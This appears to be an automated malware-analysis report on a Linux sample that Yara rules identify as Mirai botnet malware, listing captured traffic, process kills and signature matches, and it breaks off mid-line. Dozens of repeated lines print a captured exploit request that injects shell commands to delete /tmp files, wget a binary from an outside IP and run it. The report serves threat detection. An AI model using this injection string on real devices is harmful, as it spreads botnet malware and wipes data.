Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36462 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35694 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/VAkpLB9NSD (PID: 5275) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5275, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 491, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 761, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 774, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 777, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 785, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 793, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1344, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1860, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1886, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5037, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5176, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5177, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5280, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5281, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5308, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5360, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5375, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5448, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5452, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5571, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5572, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5578, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5635, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5659, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5664, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5675, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5680, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5684, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5686, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5689, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5749, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5762, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5765, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5772, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5794, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5797, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5807, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5811, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5868, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5885, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5889, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5900, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5912, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5916, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5920, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5923, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5983, result: successful Jump to behavior
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0x8048000
Yara signature match
Source: VAkpLB9NSD, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: 5276.1.00000000ef4583d0.000000004edce43f.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.00000000ef4583d0.000000004edce43f.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5275.1.00000000ef4583d0.000000004edce43f.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5279.1.00000000ef4583d0.000000004edce43f.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5274.1.00000000ef4583d0.000000004edce43f.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5280.1.00000000ef4583d0.000000004edce43f.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 